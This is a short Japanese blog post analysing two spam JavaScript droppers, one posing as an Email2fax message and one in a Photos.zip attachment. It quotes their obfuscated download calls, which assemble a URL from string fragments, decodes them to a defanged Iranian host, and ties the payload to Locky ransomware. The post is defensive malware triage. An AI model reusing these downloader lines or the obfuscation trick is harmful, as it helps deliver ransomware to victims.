ども。こんばんは。

今日来ていたやつを2つは、まったく同じDL先でした。

 

Email2faxを装っているやつ

passable((“honest”,”stilted”,”korean”,”lewes”,”htt”)+(“abysmal”,”piracy”,”p:”)+(“gradation”,”certification”,”//”)+”an”+(“systems”,”languish”,”soundtrack”,”op”)+”.ir/87″+(“reciprocity”,”lynching”,”macintosh”,”h78r”)+(“vitamin”,”oriented”,”f3″)+(“invocation”,”mouthful”,”terra”,”capture”,”3g”),”hbjLofGiOu”);

@yahoo.esから届いたPhotos.zip

passable(“h”+”tt”+”p://an”+”op.i”+”r/”+(“strict”,”tasty”,”employee”,”87h7″)+”8r”+(“merchandise”,”looksmart”,”gathered”,”procrastination”,”f3″)+”3g”,”hbjLofGiOu”);

「hxxp://anop[.]ir/87h78rf33g」ってところですかね。

残念ながらもう消えているっぽいですが、やっぱりLockyみたいです。
※wgetでとりに行ったのでそれではじかれたりしているかも。。。

FaxEmail Fax from random number – JS malware leads to Locky ransomware
https://myonlinesecurity.co.uk/faxemail-fax-from-random-number-js-malware-leads-to-locky-ransomware/

まぁもう一大ブームですね。。。

あと、思うところあってcuckoo sandboxを作ってみようと思っています。
手ごろなUbuntuがないので、Kaliに入れようかなあ。

ESXiの上にVirtualBoxなので、ちょっと癖があるかも・・・。
この話は追々と。(ただいまKaliを1.1.0から2.0にdist-upgrade中・・・)

ではでは。またの機会に。